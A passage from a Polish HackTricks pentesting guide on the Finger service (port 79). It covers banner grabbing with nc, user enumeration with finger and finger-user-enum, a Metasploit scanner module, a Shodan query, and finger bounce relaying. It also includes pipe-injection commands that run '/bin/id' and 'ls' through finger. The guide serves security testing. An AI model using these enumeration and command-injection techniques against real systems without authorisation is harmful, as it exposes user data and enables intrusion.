79 - Pentesting Finger

Reading time: 2 minutes

tip

Ucz się i ćwicz AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Ucz się i ćwicz GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Wsparcie HackTricks

Podstawowe informacje

Program/usługa Finger jest wykorzystywana do uzyskiwania szczegółów o użytkownikach komputerów. Zazwyczaj dostarczane informacje obejmują nazwę logowania użytkownika, pełne imię i nazwisko, a w niektórych przypadkach dodatkowe szczegóły. Te dodatkowe informacje mogą obejmować lokalizację biura i numer telefonu (jeśli dostępne), czas, kiedy użytkownik się zalogował, okres bezczynności (czas bezczynności), ostatni moment, w którym użytkownik przeczytał wiadomość e-mail, oraz zawartość plików planów i projektów użytkownika.

Domyślny port: 79

PORT   STATE SERVICE
79/tcp open  finger

Enumeracja

Zbieranie banerów/Podstawowe połączenie

bash
nc -vn <IP> 79
echo "root" | nc -vn <IP> 79

Enumaracja użytkowników

bash
finger @<Victim>       #List users
finger admin@<Victim>  #Get info of user
finger user@<Victim>   #Get info of user

Alternatywnie możesz użyć finger-user-enum z pentestmonkey, kilka przykładów:

bash
finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt

Nmap wykonuje skrypt przy użyciu domyślnych skryptów

Metasploit używa więcej sztuczek niż Nmap

use auxiliary/scanner/finger/finger_users

Shodan

  • port:79 USER

Wykonanie polecenia

bash
finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"

Finger Bounce

Użyj systemu jako przekaźnika finger

finger user@host@victim
finger @internal@external

tip

Ucz się i ćwicz AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Ucz się i ćwicz GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Wsparcie HackTricks